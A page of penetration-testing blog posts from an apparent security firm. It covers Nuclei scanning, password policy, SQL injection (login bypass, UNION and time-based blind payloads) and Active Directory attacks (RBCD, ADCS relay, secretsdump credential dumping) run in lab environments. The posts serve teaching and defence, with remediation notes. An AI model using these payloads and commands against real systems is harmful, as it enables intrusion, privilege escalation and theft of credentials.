Category: Exploits

  • Cool Tools Series: Nuclei

    Cool Tools Series: Nuclei

    Hopefully you enjoyed Adam Fernandez’s recent Cool Tools post, Nmap For Penetration Tests. In this next post in the series, I’d like to introduce another great penetration testing tool: Nuclei.

    Nuclei is an outstanding enumeration tool that performs a myriad of checks against the systems and services it discovers. It does particularly well against web applications. It also tests for known vulnerabilities, can pull versioning information from systems, and can try default credentials.

    Installing Nuclei

    You can use apt to easily install it on Kali Linux:

sudo apt install nuclei
    

    Templates

    Nuclei uses saved templates to perform tests against systems. This lets users create new templates as new discoveries are made. You can also generate custom templates for tasks you often use or things you discover yourself.

    More information about these templates can be found here: https://docs.projectdiscovery.io/templates/introduction

You can explore the templates Nuclei uses by default here: https://github.com/projectdiscovery/nuclei-templates/tree/main

    Options

    There are a lot of different options when using the tool, but generally, when I’m using it for external network and web application tests, I just pass a target or a list of targets to the program.

To get a full list of options, all you need to do is run this command:

nuclei -h

    To scan a single device, simply use:

    nuclei -u {Target}

    Here is an example from a recent penetration test. There was only one target, so I simply passed that target to Nuclei:

    Nuclei with one target

    You can see that Nuclei examined the responses from the web server and found that security-related headers were missing.

Here is an example using Nuclei against a list of targets. I put the targets for the engagement into a file called targets and ran the following command:

    nuclei -list {File}
    Nuclei with a list of targets
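When I want to cut down on noise, I often filter by severity and save the output to a file. Here's a rough sketch of that kind of run (the targets file and output name are placeholders; check nuclei -h for the exact flags your version supports):

nuclei -list targets -severity critical,high,medium -o nuclei-results.txt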

    Real-World Nuclei Discoveries

    Here are some examples of useful things Nuclei has found for me during various penetration tests.

    Here Nuclei found a Solr panel, revealed the version running, and shared it in a human-readable format easy for me to use as a pentester:

    Nuclei discovering Solr panel and displaying discovered information.

    Here Nuclei did some testing against a host on an internal network and successfully performed a Log4j exploit. It then reported the success with a critical flag as this could lead to remote code execution (RCE):

    Nuclei successfully performing Log4j exploit.

I’ve also found that Nuclei’s ability to try default passwords comes in handy when testing.

As an example, I took a self-hosted GitLab instance I use and changed the root account’s password to one that Nuclei checks. You can see how Nuclei successfully logged into the GitLab instance and notified me:

    Nuclei discovering a default password.

    Thanks for Reading

    There’s a lot more to Nuclei, but this is a good start. Thanks for taking a look at this post, and I hope you’ll be back for future Cool Tools posts in the series.

  • Password Length: More than Just a Question of Compliance

    Password length is a topic we’re asked about a lot, and that makes sense because it can be quite confusing. There are several different compliance models that organizations use – from PCI to NIST to OWASP and more. Each has its own standards for password strength and password length.

When it comes to penetration testing, the password recommendations we make are often more rigorous than compliance standards, and this leads to a great deal of stress, especially for organizations that have already spent time and effort implementing password rules that meet the compliance standards they’ve chosen.

    Why So Many Different Standards?

    First, speaking from experience, penetration testers see firsthand how weak and reused passwords are often a key part of achieving access over an entire domain (i.e. having administrative powers to view, add, edit, and delete users, files, and sensitive data, including passwords, for an organization’s Active Directory environment). While this is the type of success that pentesters strive to achieve, the true goal of a penetration test is to show organizations weaknesses so that they can close exploitation paths before malicious attackers find them.

    For this reason, Raxis penetration tests recommend passwords of at least 12-16 characters for users and at least 20 characters for service accounts. Of course, we recommend more than length (see below for some tips), but Raxis password cracking servers have cracked weak passwords in minutes or even seconds on internal network penetration tests and red team tests several times this year already. We don’t want our customers to experience that outside of a pentest.

    Post-It Notes With Passwords on a Monitor

On the other hand, compliance frameworks are just that – frameworks. While their aim is to guide organizations toward security, they avoid imposing a stringent set of rules that may not be necessary for every system and application. For example, a banking website should require stronger credentials and login rules than a store website that simply allows customers to keep track of the plants they’ve bought without storing financial or personal information.

If you read the small print, compliance frameworks nearly always recommend passwords longer than they require. It’s unlikely, though, that many people read those recommendations while working through a long compliance checklist with several more items to complete.

    Times are Changing

Of course, time goes on, and even compliance frameworks usually recommend at least ten-character passwords now. The PCI (Payment Card Industry) standards required for organizations that process credit cards now mandate 12-character passwords unless the system cannot accept more than eight characters. PCI DSS v4.0 requirement 8.3.6 does have some exceptions, including still allowing PCI DSS v3.2.1’s seven-character minimum length, which is grandfathered in until the end of March 2025.

This is a good example of PCI giving companies time to change. It’s been well known for years that someone with the time and expertise to build a powerful password-cracking system can crack a seven-character password hash in minutes. This leaves any organization that still allows seven-character passwords with a real risk of account compromise if a hash is leaked.

OWASP (the Open Web Application Security Project), which provides authoritative guidance for web and mobile application security practices, accepts 10 characters as the recommended minimum in their Authentication Cheat Sheet. OWASP states that they base this on the NIST SP 800-132 standard, which was published in 2010 and is currently being revised by NIST. Keep in mind that OWASP also recommends that the maximum password length not be set too low, and they recommend 128 characters as the max.

The Center for Internet Security, on the other hand, has added MFA to their password length requirements. In their CIS Password Policy Guide, published in 2021, CIS requires 14-character passwords for password-only accounts and eight-character passwords for accounts that require MFA.

    Other Factors

    This brings up a good point. There is more to a strong password than just length.  

    Digital screen showing a key

MFA (multi-factor authentication) adds a second layer of protection such as a smartphone app or a hardware token. Someone discovered or cracked your password? Well, they have one more step before they have access. Keep in mind that some apps allow bypassing MFA for a time on trusted machines (which leaves you vulnerable if a malicious insider is at work or if someone found a way into your offices).

    Also keep in mind that busy people sometimes accept alerts on their phones without reading them carefully. For this reason, Raxis has a service – MFA Phishy – that sends MFA requests to employees and alerts them (and reports to management) if they accept the false MFA requests.

    MFA is a great security tool, but it still relies on the user to be vigilant.

    Raxis’ Recommendations

    In the end, there are a myriad of ways that hackers can gain access to accounts. Raxis recommends setting the highest security possible for each layer of controls in order to encourage attackers to move on to an easier target.

    We recommend the following rules for passwords along with requiring MFA for all accounts that access sensitive data or services:

    1. Require a 12-character minimum password length.
2. Include uppercase and lowercase letters as well as numbers and at least one special character. Extra points for the number and special character being anywhere but the beginning or end of the password!
3. Do not include common patterns such as 1234567890, abcdefghijkl, your company name, or other easily guessable words. Don’t be on NordPass’s list!
    4. Do not reuse passwords across accounts, which could allow a hacker who gains access to one password to gain access to multiple accounts.

    There are two easy ways to follow these rules without causing yourself a major headache:

1. Use a password manager (such as NordPass above, BitWarden, Keeper, or 1Password, amongst others). Nowadays these tools integrate with all of your devices and browsers, so you truly only need to remember one (very long and complex) password in order to easily access all of your passwords.
      • These tools often provide password generators that quickly create & save random passwords for your accounts.
      • They usually use Face ID and fingerprint technology to make using them even easier.
      • And they also allow MFA, which we recommend using to keep your accounts secure.
    2. Use passphrases. Phrases allow you to easily remember long passwords while making them difficult for an attacker to crack or guess. Just be sure to use phrases that YOU will remember but others won’t guess.

    And I’ll leave you with one last recommendation. On Raxis penetration tests, our team often provides a list of the most common passwords we cracked during the engagement in our report to the customer. Don’t be the person with Ihatethiscompany! or Ihatemyb0ss as your password!

  • SQLi Series: SQL Timing Attacks

In the previous post we built a web page and connected it to a SQL server in order to test and learn about SQL injection. In that application the website returned data to the web page, making it easy to gather information from the database since the results were printed out.

What happens if the web application does not print the data from the SQL query? Well, there are still ways to gather data. SQLi attacks where the results are not displayed are referred to as Blind SQL Injection. Of course, this makes the attack more difficult, but these are by far the most common SQLi vulnerabilities, and attackers don’t stop just because the attack takes extra effort.

One such way is using timing. MySQL servers have a SLEEP() function that causes the server to pause for the specified number of seconds. You can use this in conjunction with comparisons, allowing the dumping of the database.

    A Refresher

We’re using basically the same application as last time, except that this time the application only returns success or failure depending on whether the username and password entered are correct. As a side note, a success/failure message can be used in much the same way, but this blog will discuss timing.

    This is the response when the username and password entered were correct:

    A success when the username and password are correct

    And this is the response when the username and password did not match:

    A failure when the password is incorrect

Now we can log in as we did last time by closing the SQL quote and commenting out the rest of the query, but we’ve already gone over that in the first blog in this series. So let’s explore dumping information from the database instead.

    Success when the password is incorrect using a SQLi attack

    Useful SQL Functions & Clauses

    In order to pull information from the database we will use a number of MySQL commands and features.

    SLEEP() Function

    The SLEEP function will cause the server to wait for the specified number of seconds before returning the information.

    Example from the command line:

    The SLEEP function

    As we can see the query takes five seconds to complete.
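The query behind that screenshot is simply something along these lines:

SELECT SLEEP(5);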

    SUBSTRING() Function

We will need to test one character at a time, so we need a way to get a single character from the returned info so we can compare it. For this we use SUBSTRING():

    SUBSTRING(String, Position, Length)
    The SUBSTRING function
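For example, a query along these lines returns the first character of the string admin:

SELECT SUBSTRING('admin', 1, 1);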

    IF() Statement

    This is how we branch in MySQL.

    IF(Condition, Value if true, Value if false)
    An IF statement

    For the Value if true and Value if false we can do more than just add return values. For instance, we can put the SLEEP function right in the IF function.

    Using the SLEEP function in an IF statement
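The query in that screenshot looks something like this, sleeping for five seconds only when the condition is true:

SELECT IF(1=1, SLEEP(5), 'false');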

    We can see that, when the condition was true, the server waited for five seconds.

    COUNT() Function

    There will be times when we need to know how many of a thing we have. For instance, we might need to know how many columns are in a table or how many rows.

    Now, in the database I’m using for testing, I know that there are three columns in the users table.

    Here is an example using COUNT showing that.

    The COUNT function
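One way to do that, using the information_schema database we’ll cover shortly, looks something like this:

SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='users';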

    DATABASE() Function

    We can get the current database in use by calling the DATABASE() function:

    The DATABASE function

    Querying Database Schemas

    If, for some reason, you need to pull the databases manually, maybe because one isn’t set or you want to see what else is out there, you can use this query:

    SELECT table_schema FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql', 'sys' ) GROUP BY table_schema;
    Querying the database schema

We should note that the default databases are excluded by the NOT IN clause.

    Getting Tables

    We can query the information_schema database to get tables in a database:

    SELECT table_name from INFORMATION_SCHEMA.tables WHERE table_schema='DATABASE';
    
    Getting tables using the information_schema

    Getting Columns

    We can also query the information_schema database to get the column names in a table:

    SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='DATABASE' and TABLE_NAME='TABLE_NAME';
    
    Getting columns using the information_schema

    Comparative Queries with the LIKE & BINARY Functions

The = operator does not always mean an exact match. With the equal sign we can see that a capital A and a lowercase a compare as equal, which is not what we want when case matters.

    An IF statement showing that the equal sign doesn't always mean "equals"

    To get around this we can use LIKE BINARY to compare. Here we find that a capital A and a lowercase a are not the same:

    Using LIKE BINARY to find strings that are exactly equal
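As a sketch, these two comparisons show the difference:

SELECT IF('A' = 'a', 'true', 'false');
SELECT IF('A' LIKE BINARY 'a', 'true', 'false');

The first returns true under MySQL’s default case-insensitive collation, while the second returns false.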

    CAST() Function

    Sometimes when comparing things, it helps to cast items to a known type.

    Here is an example of casting 9 to a character:

    The CAST function

    LENGTH() Function

    When trying to figure out what a string is, it helps to get the length of the string:

    The LENGTH function

    LIMIT & OFFSET Clauses

    Given that we are using Blind SQL, we can really only test one thing at a time. This is where limiting the amount of returned data comes in handy with the LIMIT clause.

    The LIMIT clause

We can step down the list using the OFFSET clause. Note that the offset only needs to go up to one less than the count, as that will be the last item.

    Using the OFFSET clause
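For example, a query along these lines walks the table list one row at a time as we increase the offset:

SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0;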

    Bringing It All Together

    Now that we have all the tools we need, let’s put them together and pull info from the database.

Basically, we will check character by character. The first thing we want to find is the database name, so we should first figure out how long the database name is.

Since we are using conditionals, it’s easier to inject into the username part of the query; that way we don’t need to have the right password.

    Closing off the SQL code after the username so that we don't need to know the password to perform our attacks

    First we see if the length is 1. It’s not, as the response comes back in less than five seconds.

    Discovering that the length is not 1

    Next we try 2, 3, and 4. We find out that 4 is correct, as the application takes longer than five seconds to respond.

    The Length is 4
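The payloads behind these requests look something like this in the username field (the exact strings in the screenshots may differ slightly):

admin' AND IF(LENGTH(DATABASE())=4, SLEEP(5), 0)#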

Next we need to figure out the letters in much the same way, this time using the SUBSTRING function to test one letter at a time.

    Testing Letters for the Database Name
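A sketch of that payload, testing whether the first character of the database name is S:

admin' AND IF(SUBSTRING(DATABASE(),1,1) LIKE BINARY 'S', SLEEP(5), 0)#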

    To make things easier, I used Burp Intruder to send the letters automatically, instead of manually.

We find that the request testing the letter S takes five seconds to respond, so now we know the first letter is S.

    Discovering that the first letter is "S" because there is a delay

    Next step is to test the second character.

    Testing the second character

    And we find that the second letter is Q.

    Finding that the second letter is "Q" using a timing attack

    Now, since I created the application, I know the database name is SQLi so let’s move on to getting table names.

    First we use some weird wizardry to discover the number of tables in the database, combining several of the functions we saw above:

    Getting the number of tables in the database

    Here we are getting the count of tables in the SQLi database. We find that there is only one table.
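A payload along these lines does the job, sleeping only if the table count matches the number we guess:

admin' AND IF((SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='SQLi')=1, SLEEP(5), 0)#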

    Now let’s get the table name.

    Let’s start with getting the length of the table name.

    Getting the Length of the Table Name

We find that the length of the name is five. With the length in hand, we can start grabbing the characters.

    Here’s the query we will use.

    Getting the table name one character at a time

    Basically, we are asking for all the table names for tables in the SQLi database. We grab the first one and then use substring to test one character at a time.
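As a sketch, the payload in the username field looks something like this:

admin' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='SQLi' LIMIT 1),1,1) LIKE BINARY 'u', SLEEP(5), 0)#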

    Using Burp Intruder we find the first character is u. Repeating we find that the table name is users.

    Using Burp Intruder to find the character "u" with a timing delay

    Note:

    When retrieving names with this method, knowing the length is not truly required. When trying to compare to additional characters – say position six in the table name – it will always return false, meaning that the delay will never occur. If all the possible results stay under the delay, we know that we have the entire string. I like the idea of using the length to make sure I don’t miss something, but it’s not absolutely necessary.

    Now that we have the table name, it’s time to start getting data from the table itself. First, we need to know how many columns there are in the table.

    Finding There are 3 Columns

When using the COUNT function to learn the number of columns, we find that there are three, as that’s when the server takes more than five seconds to respond. With the number of columns in hand, let’s get those column names.

    This is similar to getting the table name but just querying different information.

    Here we get the length of the first column name:

    Finding Length of First Column Name

    And next the column name itself.

    Getting the Column Name

    Since we are getting information in the same way, this is very repetitive, so I’m going to assume you get the idea and go through this quickly.

    As an example, I’ll show how to get the second column’s information, which just means adding an OFFSET to the limit:

    Getting Length of Second Column

    Here we get the first letter of the second column:

    Testing Name of Second Column

    The second column is password, so, as expected, we find that the first letter is p.

    With all the table information, now we just need to start grabbing the data from the table. We can start by seeing how much data is in a table.

Since this is a small test database, there isn’t a lot of data, so we can easily count the number of rows by comparing against small numbers. On larger sets you may have to be more careful or smarter in gathering info. But this is a basic writeup giving the ideas, and I’ll leave that as an exercise for the reader.

    With this database, we find that there are only three records in the table:

    Getting Amount of Data in Table

    Now let’s get the first username from the table:

    Getting the Username

    And finally, we get their password:

    Getting the Password
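The payloads for pulling table data follow the same shape, with the subquery switched to the users table. As a sketch (testing whether the first character of the first username is a):

admin' AND IF(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1) LIKE BINARY 'a', SLEEP(5), 0)#

Swapping username for password in the subquery pulls the password the same way.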

    In Conclusion

Timing attacks, as with all Blind SQLi, take a good deal of time and patience, but the rewards can be discovering credentials to log in to the database or sensitive customer information like PII (Personally Identifiable Information) and financial data, such as credit card numbers.

As with all injection attacks, the remediation is to always validate user input. Raxis recommends keeping a list of whitelisted characters and deleting all other characters before the input is processed by the database. Cleansing data to be certain that user input is always treated as text (and not run as a command) is also key to this process.

Understanding how to perform attacks like these is critical for web and mobile application penetration testers, just as understanding how they work is key for application developers so that they can build safeguards into their apps to protect their data and their users.

  • SQLi Series: An Introduction to SQL Injection

    Web applications often need to store data to better serve their customers. An example would be storing customer login information or comments submitted by users on the webpage. There are many ways of storing data for customers, but a popular way is to store the information in a SQL database.

    A common and basic use of web applications and SQL databases is to handle user login information and functionality. In many web applications a user submits a username and password into a form. The web application takes the submitted data and searches the database to determine if it’s a valid credential set. If it is, then the web application will log the user in.

    SQL Injection

    If the web application does not properly handle user input, an attacker might be able to create malicious input that changes the SQL query that performs that login task behind the scenes. Such SQL injection attacks take a lot of manual effort to discover and exploit, but they are a critical part of the web application penetration tests that we perform at Raxis.

    This blog explains how an attacker could find and exploit a SQL injection, or SQLi, vulnerability.

    Creating an Exploitable Login Webpage

    Let’s build a simple web application that asks for a username and password and returns the user’s ID. In order to help show the SQL injection attack, the application will also show the query used and the input from the login page. The SQL code the application uses (with user input parameters filled in) can be seen at the bottom of each screenshot.

    First let’s take a look at the results for the admin logging in normally.

    Successful login showing SQL query

    We can see that the user entered the admin username and password. We also see that our sample PHP web application uses a query where the username and password must match for success. If both match then, for our testing purposes, it returns the user ID which is printed out at the bottom.

    Here the admin’s account has the ID of 1.

    In the next example, the admin username is entered correctly, but the wrong password is supplied.

    Unsuccessful login showing the SQL query

    Again we can see the information that was input into the application and the query. However, since the password does not match the one in the database, we don’t get the user ID.

    Exploiting the Webpage to Login

    In the example queries above we saw that the username and password input was passed into the query without modification.

    So what happens if we close the single quote around the username?

    Attempted SQL injection with a single quote

    We see that, even though the correct password was entered, the single quote at the end of the username prevents the query from returning a correct result. In this case we get the same error message as if the username and password were incorrect, but other web applications might crash in different ways indicating there was a backend issue.

    In MySQL the # symbol denotes a comment, which makes the database ignore everything after it. Let’s try adding a # after that single quote we just added:

    Successful SQL injection bypassing the password
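For reference, the username submitted here is along these lines, with anything at all in the password field:

admin'#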

Now we see that, even though we submitted the wrong password, the application considers the SQL query successful and returns the correct user ID. The question is: what is happening here?

    Let’s take a closer look at the query and the input from the user.

The input in the username field has injected two special SQL characters: the ' (single quote) and the #.

    This changes the query itself because the user input is directly inserted into the query.

    Highlighting that the MySQL # comment symbol allowed the SQL injection to work

    The single quote closes the username entry so that the text that comes after is read as part of the SQL query. This means that the # is interpreted as the comment symbol, meaning that the rest of the query is simply ignored.

    Basically, that means that the query is now just running as

SELECT id, username, password FROM users WHERE username='admin'

    Since the admin user exists, we get the successful result of the user id of 1, even with the wrong password.

This also means that we can log in as any user, provided that we know their username. Just change the admin username to the desired username.

    Using the same injection string to login as another user

    Exploiting the Webpage to Get Data

    Now logging in as any user is fun and all, but what else can we do? Well, we can come up with SQL queries that dump information from the database.

    Let’s use the UNION operator to inject another SQL query that goes along with the query created by the application. We should note that, since the sample web application only shows one column at a time, we need to switch what we are asking for first so that the application will show us more information.

    Here is what happens when we add a UNION SELECT for all the user IDs from the users table to the SQL injection we are entering in the username field:

    SQL injection adding UNION SELECT to get a list of all user IDs.

    After asking for the IDs, we enter a new SQL injection and ask for the usernames:

    SQL injection adding UNION SELECT to get a list of all usernames.

    And finally, we perform a SQL injection requesting the passwords:

    SQL injection adding UNION SELECT to get a list of all passwords.
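The exact payloads are in the screenshots, but they follow this general shape in the username field, padding the three-column query with NULLs and swapping in the column we want displayed:

' UNION SELECT id, NULL, NULL FROM users#
' UNION SELECT username, NULL, NULL FROM users#
' UNION SELECT password, NULL, NULL FROM users#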

    A Quick Note on Password Hashes

    This is a good time to note why using password hashes (instead of saving passwords in plaintext) is a good idea. If password hashes were in use, an attacker would have to crack the passwords in order for them to be useful in a SQL injection attack.

    Automated Exploitation with SQLMap

While we can perform attacks such as these manually, sometimes, after identifying a vulnerability, it is easier to let tools exploit it for you. In real-world scenarios, the application doesn’t return the SQL statement, and it takes some trial and error to discover how the application is reacting to our input.

    My go-to tool for SQL injection attacks once I find a sign of them is always SQLMap. Here is a screenshot of SQLMap dumping the users table from the SQLi database the web application above uses.

    The SQLMap tool performing the same exploit we did manually

    SQLMap makes it a lot easier to dump information from a database when an application is susceptible to SQLi attacks. While here it dumped the same information we just did, it is capable of finding every table and column and dumping everything.

    More Than SQLi

    We should also note there are other ways of getting information from a database, including timing attacks in which a database waits to respond if something is true while responding quickly if it’s not. Timing attacks allow us to guess what input is valid and what is not valid. Maybe we will take a look at a timing attack example in another post.

    In Conclusion

    Now that we have a basic understanding of what SQL injection is and the types of exploits that can be done with it, my next posts in this series will go into specific attacks and how to perform them.

    As always, remember that these tutorials are guides for penetration testers and people looking to understand their penetration test results better. Attempting these attacks on any sites that don’t belong to you or where you don’t have legal documentation granting you access to perform ethical penetration testing is illegal and punishable under law.

  • AD Series: Resource Based Constrained Delegation (RBCD)

In a Windows domain, devices have an msDS-AllowedToActOnBehalfOfOtherIdentity attribute. Per Microsoft, “this attribute is used for access checks to determine if a requestor has permission to act on the behalf of other identities to services running as this account.” In this blog, we will exploit this feature to gain administrative access to a target system in a Resource Based Constrained Delegation (RBCD) attack.

We’ll be using the Active Directory testing environment we set up in the first post in this series.

    Tools We’ll Be Using

    • NoPAC Scanner
    • Impacket Tools (installed on Kali):
      • addcomputer.py
      • rbcd.py
      • getST.py
      • secretsdump.py
      • psexec.py
    • Certipy

    The Basics of the RBCD Exploit

    First we need to have control of an account with an SPN (Service Principal Name). The easiest way to do this for our test is to create a machine account. By default any non-admin user can create up to 10 machine accounts, but this value is set by the MachineAccountQuota. You can query this info by using NoPAC scanner.

    python3 scanner.py Domain/User -dc-ip DC-IP
    
    Using NoPAC scanner to discover the MachineAccountQuota

Since the MachineAccountQuota is above 0 (again, the default is 10), any user can create a machine account. I used impacket’s addcomputer.py script.

addcomputer.py 'domain/user:Password' -dc-ip DC-IP
    
    Using impacket’s addcomputer script to create a new machine account
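If you’d rather pick the machine account’s name and password than take the defaults, addcomputer.py accepts them as options. A sketch with placeholder values for the new account:

addcomputer.py 'domain/user:Password' -dc-ip DC-IP -computer-name 'NEWPC01$' -computer-pass 'Password123'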

    For initial testing I gave the special.user user the write privilege over the lab1 machine.

The write privilege is all that is needed to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

Adding the write privilege in order to modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute

    After giving the write privilege to the account, I used rbcd.py script from impacket to modify the attribute and add the created computer account.

rbcd.py -delegate-from 'Controlled Account' -delegate-to 'target' -dc-ip DC-IP -action write 'Domain/User:Password'
    Using the rbcd.py script to modify the attribute and add the created computer account.

After configuring the attribute, I used impacket’s getST.py script to get a Kerberos ticket where we impersonate the administrator user on that device. In this case make sure to log in using the created machine account.

getST.py -spn 'cifs/target' -impersonate Target-Account -dc-ip DC-IP 'Domain/User:Password'
    Using impacket’s getST.py script to get a Kerberos ticket where special.user impersonates the administrator user for that device

In order to use the ticket, first I exported an environment variable that points to the created ticket.

    export KRB5CCNAME={Ticket}
    
Exporting an environment variable that points to the created ticket

    Now that I have the ticket, I can use it with a bunch of tools. I used secretsdump as an example.

    secretsdump.py administrator@Target -k -dc-ip DC-IP -target-ip Target-IP
    
    Using secretsdump to dump local SAM hashes using the exported ticket

    Note: When using the tickets, make sure the target isn’t an IP address but rather the domain name (i.e. lab1.ad.lab). You can use the target-ip flag to point to the right computer if names don’t resolve. I don’t want to admit how long it took me to figure that out.

    Playing around with RBCD

Certipy has the ability to access an LDAP shell with a PFX certificate. Say web enrollment is enabled. As we discussed in the past, you can force the server to authenticate to you and then relay that authentication to web enrollment.

    certipy relay -ca CA-IP
    Using certipy to force the server to authenticate to you then relay it to web enrollment

    After a successful relay you can use the saved certificate to access the LDAP shell.

    certipy auth -pfx Saved-Cert -ldap-shell -dc-ip DC-IP
    Accessing the LDAP shell with PFX certificate

    Once in the LDAP shell you can set up the RBCD attack with the set_rbcd command where the first argument is the target device and the second is the controlled account.

    set_rbcd Target Controlled-Account
    Using set_rbcd to set the target as a controlled account

    After setting up the RBCD, it’s the same as before using getST to get the ticket and run with it.

impacket-getST -spn cifs/target -impersonate Target-Account -dc-ip DC-IP 'Domain/User:Password'
    Using getST.py to get the ticket as before
    impacket-psexec 'Domain/administrator@Target' -k -no-pass -dc-ip DC-IP -target-ip Target-IP
    Using impacket's psexec to gain access to an admin share

Next I wanted to try the same thing but against the domain controller. So I set up certipy to get a domain controller certificate, as we’ve previously discussed.

    As a note, because it’s a domain controller, the template has to be specified as DomainController, but you can still use it to access an LDAP shell.

    certipy relay -ca CA-IP -template DomainController
    Using certipy to force the server to authenticate to you then relay it to web enrollment, this time using the domain controller template

    Then, as before, I accessed the LDAP shell and set up the RBCD attack.

    certipy auth -pfx Saved-Cert -ldap-shell -dc-ip DC-IP
    Accessing the LDAP shell with PFX certificate again
    set_rbcd Target Controlled-Account
    Using set_rbcd to set the target as a controlled account, this time for a domain controller

    Then it’s just the same thing as the other tests.

impacket-getST -spn cifs/target -impersonate Target-Account -dc-ip DC-IP 'Domain/User:Password'
    Using getST.py to get the ticket as before
    impacket-psexec 'Domain/administrator@Target' -dc-ip DC-IP -target-ip Target-IP -k -no-pass
    Using impacket's psexec to gain access to an admin share

    Protecting Against RBCD

    I made a new user, protected.user, to show how to add protections within Active Directory to prevent these attacks. Here I successfully exploit RBCD before adding protections.

    Using getST.py to get the ticket before we've added protections, and it still works like before

    As expected, it worked.

    Now I checked the box that prevents the account from being delegated.

    Checking the "Account is sensitive and cannot be delegated" box in protected.user's settings

    And then I tried again.

    Using getST.py in an attempt to get the ticket after we've added protections, and now it no longer works

    This time the attack didn’t work, which is what we were looking for.

    Microsoft also has a group called Protected Users which should (based on my understanding) enable protections against this and other attacks. While I’ve been blocked before by that group while performing penetration tests, for some reason, in my lab, adding a user to that group did not actually prevent the attack. I’m not sure why, but it didn’t, hence the method I discovered above to be sure the account is protected.

    A Final Note

    The end result for RBCD really is just getting administrative access to a machine. It’s a privilege escalation exploit, and it only works on the machine you’re targeting, not across the domain. If you’re on a DC then great. But it’s still a great way for someone to get admin access to a machine in order to try lateral movement or to access info on that machine during a penetration test.

    Want to learn more? Take a look at the first in this Active Directory Series.

  • An Inside Look at a Raxis Red Team

    Raxis’ Cybersecurity Red Team Test is our top tier test that gives our customers a true feel of what hackers could and would do to their systems, networks, employees, and even offices and storefront locations.

    Curious to know more? Take a look at this short video that gives a true look at real Raxis red team tests.

    While that looks like fun and games, it’s actually serious business. Red team tests are slow and methodical, making sure not to trip any alarms or cause wariness… until the first crack in the armor appears and then things often move quickly from there.

    Hackers look for the low hanging fruit. Whether that is a friendly employee who lets them in, a badge reader system that is vulnerable to simple attacks, or an unsecured wireless network reachable from the parking lot, it’s likely only the first step. Once the Raxis team has some sort of access, we move quickly to establish long term access and to gain deeper access.

While network and application penetration tests check your security controls and make sure that you are protecting each system to the fullest extent and following best security practices, a red team widens the scope and looks at any way – often the easiest way – to get in, covering all or most of your systems, just as a malicious hacker would.

    Take a look at your cybersecurity controls, and, when you’re ready to take your testing to the next level, reach out to schedule a Raxis Cybersecurity Red Team Test.

  • AD Series: Active Directory Certificate Services (ADCS) Exploits Using NTLMRelayx.py

    I recently updated the last installment in my AD series – Active Directory Certificate Services (ADCS) Misconfiguration Exploits – with a few new tricks I discovered recently on an engagement. I mentioned that I have seen web enrollment where it does not listen on port 80 (HTTP), which is the default for certipy. I ran into some weird issues with certipy when testing on port 443, and I found that NTLMRelayx.py worked better in that case. As promised, here is a short blog explaining what I did.

    This is basically the same thing as using certipy – just a different set of commands. So here we will go through an example and see how it works.

    First we setup the relay.

    impacket-ntlmrelayx -t {Target} --adcs --template {Template Name} -smb2support
    Impacket command and results.

    The first part of the command points to the target. Make sure to include the endpoint (/certsrv/certfnsh.asp) as NTLMRelay won’t know that on its own. Also make sure to tell NTLMRelay if the host is HTTP or HTTPS.

    The adcs flag tells NTLMRelay that we are attacking ADCS, and the template flag is used to specify the template. This is needed if you are relaying a domain controller or want to target a specific template. However, if you are planning on just relaying machines or users, you can actually leave this part out.

As connections come in, NTLMRelay will figure out on its own whether it’s a user or machine account and request the proper certificate. It does this based on whether the incoming username ends in a dollar sign: if it does, NTLMRelay requests a machine certificate; if not, it requests a user certificate.
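Putting that together, a relay against web enrollment listening over HTTPS looks something like this (the CA hostname here is a placeholder, and you can drop the template flag if you’re only relaying user and machine accounts):

impacket-ntlmrelayx -t https://ca.ad.lab/certsrv/certfnsh.asp --adcs --template DomainController -smb2support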

    Once NTLMRelay gets a successful relay, it will return a large Base64 blob of data. This is a Base64 encoded certificate.

    Base64 certificate.

    You can take this Base64 blob and save it to a file. Then just decode the Base64 and save that as a PFX certificate file. After that the attack is the same as the certipy attack in my previous blog. Just use the certificate to login.
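As a quick sketch, assuming the blob was saved to a file called cert.b64:

base64 -d cert.b64 > cert.pfx
certipy auth -pfx cert.pfx -dc-ip DC-IP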

    Saving, decoding, and using the Base64 certificate to login.

    Want to learn more? Take a look at the next part of our Active Directory Series.

  • AD Series: Active Directory Certificate Services (ADCS) Misconfiguration Exploits

    Note: This blog was last updated 1/23/2024. Updates are noted by date below.

Active Directory Certificate Services (ADCS) is a server role that allows a corporation to build a public key infrastructure. This allows the organization to provide public key cryptography, digital certificate, and digital signature capabilities to the internal domain.

    While using ADCS can provide a company with valuable capabilities on their network, a misconfigured ADCS server could allow an attacker to gain additional unauthorized access to the domain. This blog outlines exploitation techniques for vulnerable ADCS misconfigurations that we see in the field.

    Tools We’ll Be Using
    • Certipy: A great tool for exploiting several ADCS misconfigurations.
    • PetitPotam: A tool that coerces Windows hosts to authenticate to other machines.
• Secretsdump (a python script included in Impacket): A tool that dumps SAM and LSA secrets using methods such as pass-the-hash. It can also be used to dump all of the password hashes for the domain from the domain controller.
• CrackMapExec: A multi-faceted tool that, among other things, can dump user credentials while spraying credentials across the network to access more systems.
• A test Active Directory environment like the one we provisioned in the first blog in this series.

Exploit 1: ADCS Web Enrollment

If an ADCS certificate authority has web enrollment enabled, an attacker can perform a relay attack against the Certificate Authority, possibly escalating privileges within the domain. We can use Certipy to find ADCS Certificate Authority servers by using the tool’s find command. Note that the attacker would need access to the domain, but the credentials of any authenticated user are all that is needed to perform the attack.

    certipy find -dc-ip {DC IP Address} -u {User} -p {Password}
    Using Certipy to find an ADCS Certificate Authority Server

First, while setting up ADCS in my test environment, I set up a Certificate Authority to use for this testing.

    Certipy’s find command also has a vulnerable flag that will only show misconfigurations within ADCS.

    certipy find -dc-ip {DC IP Address} -u {Username} -p {Password} -vulnerable
    Using Certipy’s Vulnerable flag

    The text file output lists misconfigurations found by Certipy. While setting up my lab environment I checked the box for web enrollment. Here we see that the default configuration is vulnerable to the ESC8 attack:

    Web Enrollment Vulnerability

